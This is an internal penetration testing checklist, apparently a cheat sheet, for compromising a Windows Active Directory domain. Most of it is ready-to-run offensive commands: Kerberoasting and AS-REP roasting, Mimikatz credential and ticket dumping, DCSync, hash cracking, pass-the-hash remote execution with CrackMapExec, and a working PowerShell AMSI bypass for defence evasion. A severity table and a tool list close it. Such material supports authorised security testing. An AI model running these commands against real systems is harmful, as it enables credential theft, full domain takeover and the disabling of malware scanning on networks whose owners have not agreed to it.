Internal Penetration Testing Checklist
🔍 Initial Reconnaissance
Network Discovery
Service Enumeration
👤 Active Directory Enumeration
Domain Information
BloodHound Collection
# SharpHound
.\SharpHound.exe -c All -d domain.local
Python collector
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c all
AD Attack Paths
🎫 Kerberos Attacks
Kerberoasting
# Impacket
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request
Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
AS-REP Roasting
# Impacket
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP
Pass-the-Ticket
🔑 Credential Harvesting
Memory Extraction
# Mimikatz
sekurlsa::logonpasswords
sekurlsa::tickets /export
lsadump::sam
lsadump::dcsync /domain:domain.local /user:Administrator
Credential Locations
Hash Cracking
# Hashcat
hashcat -m 1000 hashes.txt wordlist.txt # NTLM
hashcat -m 13100 hashes.txt wordlist.txt # Kerberoast
hashcat -m 18200 hashes.txt wordlist.txt # AS-REP
↔️ Lateral Movement
Techniques
CrackMapExec
# Check admin access
cme smb targets.txt -u user -p pass --local-auth
Execute commands
cme smb target -u admin -H hash -x "whoami"
Dump SAM
cme smb target -u admin -H hash --sam
⬆️ Privilege Escalation
Windows PrivEsc
Tools
# WinPEAS
.\winPEASx64.exe
PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
Seatbelt
.\Seatbelt.exe -group=all
🏰 Domain Dominance
DCSync Attack
# Mimikatz
lsadump::dcsync /domain:domain.local /all /csv
Impacket
secretsdump.py domain/admin:password@DC_IP
Persistence
🛡️ Defense Evasion
Techniques
AMSI Bypass Examples
# Basic bypass (encoded)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
📊 Severity Matrix
| Finding |
Severity |
Impact |
| Domain Admin compromise |
Critical |
Full domain control |
| Kerberoastable DA |
Critical |
Potential DA access |
| DCSync rights |
Critical |
All domain hashes |
| Local admin on multiple |
High |
Lateral movement |
| Weak password policy |
High |
Credential compromise |
| LLMNR/NBT-NS enabled |
Medium |
Credential capture |
| SMB signing disabled |
Medium |
Relay attacks |
🛠️ Essential Tools
| Tool |
Purpose |
| BloodHound |
AD attack path analysis |
| CrackMapExec |
Network pentesting |
| Impacket |
Network protocols |
| Mimikatz |
Credential extraction |
| Rubeus |
Kerberos attacks |
| PowerView |
AD enumeration |
| Responder |
Credential capture |
Last updated: 2024